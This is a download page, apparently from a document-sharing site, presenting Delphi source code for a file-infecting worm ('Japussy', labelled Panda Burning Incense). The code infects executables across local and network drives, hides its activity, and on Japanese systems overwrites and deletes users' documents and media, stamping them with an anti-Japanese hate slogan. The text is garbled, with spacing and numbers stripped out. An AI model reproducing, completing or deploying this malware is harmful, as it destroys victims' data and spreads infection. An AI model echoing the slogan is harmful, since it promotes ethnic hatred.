Panda Burning Incense (熊猫烧香) Source Code Free Download

三甲居士
2011-12-29

Summary: This document is "Panda Burning Incense Source Code Free Download.doc", applicable to the IT/computer field.

熊猫烧香源代码免费下载programJapussyusesWindows,SysUtils,Classes,Graphics,ShellAPI{,Registry}constHeaderSize=病毒体的大小IconOffset=EBPE文件主图标的偏移量在我的DelphiSP上面编译得到的大小其它版本的Delphi可能不同查找的十六进制字符串可以找到主图标的偏移量{HeaderSize=Upx压缩过病毒体的大小IconOffset=BCUpx压缩过PE文件主图标的偏移量UpxW用法:upxJapussyexe}IconSize=EPE文件主图标的大小字节IconTail=IconOffsetIconSizePE文件主图标的尾部ID=感染标记垃圾码以备写入Catchword='Ifaraceneedtobekilledout,itmustbeYamato''Ifacountryneedtobedestroyed,itmustbeJapan!''***WJapussyWormA***'{$R*RES}functionRegisterServiceProcess(dwProcessID,dwType:Integer):Integerstdcallexternal'Kerneldll'函数声明varTmpFile:stringSi:STARTUPINFOPi:PROCESSINFORMATIONIsJap:Boolean=False日文操作系统标记{判断是否为Winx}functionIsWinx:BooleanvarVer:TOSVersionInfobeginResult:=FalseVerdwOSVersionInfoSize:=SizeOf(TOSVersionInfo)ifnotGetVersionEx(Ver)thenExitif(VerdwPlatformID=VERPLATFORMWINWINDOWS)thenWinxResult:=Trueend{在流之间复制}procedureCopyStream(Src:TStreamsStartPos:IntegerDst:TStreamdStartPos:IntegerCount:Integer)varsCurPos,dCurPos:IntegerbeginsCurPos:=SrcPositiondCurPos:=DstPositionSrcSeek(sStartPos,)DstSeek(dStartPos,)DstCopyFrom(Src,Count)SrcSeek(sCurPos,)DstSeek(dCurPos,)end{将宿主文件从已感染的PE文件中分离出来以备使用}procedureExtractFile(FileName:string)varsStream,dStream:TFileStreambegintrysStream:=TFileStreamCreate(ParamStr(),fmOpenReadorfmShareDenyNone)trydStream:=TFileStreamCreate(FileName,fmCreate)trysStreamSeek(HeaderSize,)跳过头部的病毒部分dStreamCopyFrom(sStream,sStreamSizeHeaderSize)finallydStreamFreeendfinallysStreamFreeendexceptendend{填充STARTUPINFO结构}procedureFillStartupInfo(varSi:STARTUPINFOState:Word)beginSicb:=SizeOf(Si)SilpReserved:=nilSilpDesktop:=nilSilpTitle:=nilSidwFlags:=STARTFUSESHOWWINDOWSiwShowWindow:=StateSicbReserved:=SilpReserved:=nilend{发带毒邮件}procedureSendMailbegin哪位仁兄愿意完成之?end{感染PE文件}procedureInfectOneFile(FileName:string)varHdrStream,SrcStream:TFileStreamIcoStream,DstStream:TMemoryStreamiID:LongIntaIcon:TIconInfected,IsPE:Booleani:IntegerBuf:arrayofCharbegintry出错则文件正在被使用退出ifCompareText(FileName,'JAPUSSYEXE')=then是自己则不感染ExitInfected:=FalseIsPE:=Fal
seSrcStream:=TFileStreamCreate(FileName,fmOpenRead)tryfori:=todo检查PE文件头beginSrcStreamSeek(i,soFromBeginning)SrcStreamRead(Buf,)if(Buf=#)and(Buf=#)thenPE标记beginIsPE:=True是PE文件BreakendendSrcStreamSeek(,soFromEnd)检查感染标记SrcStreamRead(iID,)if(iID=ID)or(SrcStreamSize<)then太小的文件不感染Infected:=TruefinallySrcStreamFreeendifInfectedor(notIsPE)then如果感染过了或不是PE文件则退出ExitIcoStream:=TMemoryStreamCreateDstStream:=TMemoryStreamCreatetryaIcon:=TIconCreatetry得到被感染文件的主图标(字节)存入流aIconReleaseHandleaIconHandle:=ExtractIcon(HInstance,PChar(FileName),)aIconSaveToStream(IcoStream)finallyaIconFreeendSrcStream:=TFileStreamCreate(FileName,fmOpenRead)头文件HdrStream:=TFileStreamCreate(ParamStr(),fmOpenReadorfmShareDenyNone)try写入病毒体主图标之前的数据CopyStream(HdrStream,,DstStream,,IconOffset)写入目前程序的主图标CopyStream(IcoStream,,DstStream,IconOffset,IconSize)写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream,IconTail,DstStream,IconTail,HeaderSizeIconTail)写入宿主程序CopyStream(SrcStream,,DstStream,HeaderSize,SrcStreamSize)写入已感染的标记DstStreamSeek(,)iID:=DstStreamWrite(iID,)finallyHdrStreamFreeendfinallySrcStreamFreeIcoStreamFreeDstStreamSaveToFile(FileName)替换宿主文件DstStreamFreeendexceptendend{将目标文件写入垃圾码后删除}procedureSmashFile(FileName:string)varFileHandle:Integeri,Size,Mass,Max,Len:IntegerbegintrySetFileAttributes(PChar(FileName),)去掉只读属性FileHandle:=FileOpen(FileName,fmOpenWrite)打开文件trySize:=GetFileSize(FileHandle,nil)文件大小i:=RandomizeMax:=Random()写入垃圾码的随机次数ifMax<thenMax:=Mass:=SizedivMax每个间隔块的大小Len:=Length(Catchword)whilei<MaxdobeginFileSeek(FileHandle,i*Mass,)定位写入垃圾码将文件彻底破坏掉FileWrite(FileHandle,Catchword,Len)Inc(i)endfinallyFileClose(FileHandle)关闭文件endDeleteFile(PChar(FileName))删除之exceptendend{获得可写的驱动器列表}functionGetDrives:stringvarDiskType:WordD:CharStr:stringi:Integerbeginfori:=todo遍历个字母beginD:=Chr(i)Str:=D':'DiskType:=GetDriveType(PChar(Str))得到本地磁盘和网络盘if(DiskType=DRIVEFIXED)or(DiskType=DRIVEREMOTE)thenResult:=ResultDendend{遍历目录感染和摧毁文件}procedureLoopFiles(Path,Mask:string)vari,Count:IntegerFn,Ext:stringSubDir:TStringsSearchRec:TSearchRecMsg
:TMsgfunctionIsValidDir(SearchRec:TSearchRec):Integerbeginif(SearchRecAttr<>)and(SearchRecName<>'')and(SearchRecName<>'')thenResult:=不是目录elseif(SearchRecAttr=)and(SearchRecName<>'')and(SearchRecName<>'')thenResult:=不是根目录elseResult:=是根目录endbeginif(FindFirst(PathMask,faAnyFile,SearchRec)=)thenbeginrepeatPeekMessage(Msg,,,,PMREMOVE)调整消息队列避免引起怀疑ifIsValidDir(SearchRec)=thenbeginFn:=PathSearchRecNameExt:=UpperCase(ExtractFileExt(Fn))if(Ext='EXE')or(Ext='SCR')thenbeginInfectOneFile(Fn)感染可执行文件endelseif(Ext='HTM')or(Ext='HTML')or(Ext='ASP')thenbegin感染HTML和ASP文件将Base编码后的病毒写入感染浏览此网页的所有用户哪位大兄弟愿意完成之?endelseifExt='WAB'thenOutlook地址簿文件begin获取Outlook邮件地址endelseifExt='ADC'thenFoxmail地址自动完成文件begin获取Foxmail邮件地址endelseifExt='IND'thenFoxmail地址簿文件begin获取Foxmail邮件地址endelsebeginifIsJapthen是倭文操作系统beginif(Ext='DOC')or(Ext='XLS')or(Ext='MDB')or(Ext='MP')or(Ext='RM')or(Ext='RA')or(Ext='WMA')or(Ext='ZIP')or(Ext='RAR')or(Ext='MPEG')or(Ext='ASF')or(Ext='JPG')or(Ext='JPEG')or(Ext='GIF')or(Ext='SWF')or(Ext='PDF')or(Ext='CHM')or(Ext='AVI')thenSmashFile(Fn)摧毁文件endendend感染或删除一个文件后睡眠毫秒避免CPU占用率过高引起怀疑Sleep()until(FindNext(SearchRec)<>)endFindClose(SearchRec)SubDir:=TStringListCreateif(FindFirst(Path'**',faDirectory,SearchRec)=)thenbeginrepeatifIsValidDir(SearchRec)=thenSubDirAdd(SearchRecName)until(FindNext(SearchRec)<>)endFindClose(SearchRec)Count:=SubDirCountfori:=toCountdoLoopFiles(PathSubDirStrings'',Mask)FreeAndNil(SubDir)end{遍历磁盘上所有的文件}procedureInfectFilesvarDriverList:stringi,Len:IntegerbeginifGetACP=then日文操作系统IsJap:=True去死吧!DriverList:=GetDrives得到可写的磁盘列表Len:=Length(DriverList)whileTruedo死循环beginfori:=Lendowntodo遍历每个磁盘驱动器LoopFiles(DriverList':','**')感染之SendMail发带毒邮件Sleep(**)睡眠分钟endend{主程序开始}beginifIsWinxthen是WinxRegisterServiceProcess(GetCurrentProcessID,)注册为服务进程elseWinNTbegin远程线程映射到Explorer进程哪位兄台愿意完成之?end如果是原始病毒体自己ifCompareText(ExtractFileName(ParamStr()),'Japussyexe')=thenInfectFiles感染和发邮件else已寄生于宿主程序上了开始工作beginTmpFile:=ParamStr()创建临时文件Delete(TmpFile,Length(TmpFile),)TmpFile:=TmpFile#'exe'真正的宿主文
件多一个空格ExtractFile(TmpFile)分离之FillStartupInfo(Si,SWSHOWDEFAULT)CreateProcess(PChar(TmpFile),PChar(TmpFile),nil,nil,True,,nil,'',Si,Pi)创建新进程运行之InfectFiles感染和发邮件endend
